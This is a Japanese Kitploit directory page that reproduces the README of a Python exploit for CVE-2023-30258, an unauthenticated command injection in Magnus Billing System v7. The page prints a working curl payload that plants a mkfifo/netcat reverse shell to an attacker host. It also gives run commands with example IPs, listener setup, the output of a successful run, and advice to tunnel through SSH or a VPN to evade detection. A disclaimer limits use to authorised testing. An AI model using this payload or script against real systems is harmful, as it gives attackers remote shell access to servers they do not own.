Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit | Kitploit
ツール/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
711年前未レビュー

Magnus Billing System v7 エクスプロイト

このPythonスクリプトは、Magnus Billing System v7のコマンドインジェクション脆弱性、具体的には /mbilling/lib/icepay/icepay.php にある icepay.php スクリプトの脆弱性を悪用する処理を自動化します。このエクスプロイトは democ パラメータを利用して対象システム上で任意のコマンドを実行し、最終的に攻撃者が管理するマシンへのリバースシェルを確立します。

脆弱性の概要

この脆弱性により、巧妙に細工されたGETリクエストによる認証なしのコマンドインジェクションが可能になります。元の概念実証(PoC)では、次の curl コマンドが使用されていました:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

このスクリプトはそのプロセスを自動化し、コマンドライン引数で設定できるようにしています。

特徴

  • 設定可能: コマンドライン引数で対象IP、攻撃者IP、ポートを指定できます
  • シンプル: requests ライブラリを使用してペイロードを含むHTTPリクエストを送信します
  • フィードバック: エクスプロイトの進行状況を追跡するための明確な出力を提供します

前提条件

  • Python 3.x: システムにPython 3がインストールされていることを確認してください
  • Requestsライブラリ: requests Pythonモジュールをインストールします:
    root@kitploit:~
    pip install requests
    
  • Netcat: ターゲットシステムでリバースシェルを機能させるには netcat (nc) がインストールされている必要があります
  • リスナー: リバースシェルを受け取るために、攻撃マシン上で netcat リスナーをセットアップします
  • 脆弱なターゲット: ターゲットはMagnus Billing System v7を実行しており、脆弱な icepay.php スクリプトにアクセス可能である必要があります

使用方法

セットアップ

  1. クローンまたはダウンロード: スクリプトを exploit.py として保存します
  2. リスナーのセットアップ: 攻撃マシン上で netcat リスナーを起動します:
    root@kitploit:~
    nc -lvnp <PORT>
    
    <PORT> を選択したポート(例:443)に置き換えてください

エクスプロイトの実行

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

パラメータ:

  • -t, --target: 対象のMagnus Billing SystemのIPアドレス
  • -a, --attacker: リバースシェルを受け取るあなたのIPアドレス
  • -p, --port: リバースシェル用のあなたのマシンのポート

例

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

期待される出力:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. シェルを取得: 成功した場合は、netcat リスナーに切り替えてリバースシェルを操作します

技術的な注意事項

  • ペイロードタイプ: このスクリプトは netcat を使用したFIFOベースのリバースシェル(mkfifo)を使用します
  • エラーハンドリング: ネットワークエラーと無効なポートの基本的なチェックが含まれています
  • デバッグ: サーバーの応答を確認するには、exploit() 関数内の print(response.text) のコメントを解除します
  • 代替ペイロード: 必要に応じて、このスクリプトを変更して別のリバースシェルペイロードを使用できます

トラブルシューティング

  • 接続に失敗した場合は、以下を確認してください:
    • ターゲットシステムに netcat がインストールされていること
    • ファイアウォールが接続をブロックしていないこと
    • 正しいポートが使用されていること
    • ターゲットがパッチ適用されていないこと

セキュリティに関する考慮事項

  • 検出を回避するために、このエクスプロイトを使用する際はSSHトンネリングまたはVPNの使用を検討してください
  • ペイロードはセキュリティ監視システムをトリガーする可能性があります

免責事項

このツールは、教育およびセキュリティテスト目的のみで提供されます。明示的な許可を得たシステムでのみ使用してください。所有していない、またはテストの同意がないシステムに対する無許可の使用は、違法かつ非倫理的です。作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。

ライセンス

このプロジェクトはMITライセンスのもとで公開されています。免責事項を維持した上で、必要に応じて修正および配布してください。

貢献

貢献、バグ報告、機能リクエストを歓迎します。プルリクエストを送信するか、イシューを開いてください。

ツールをダウンロード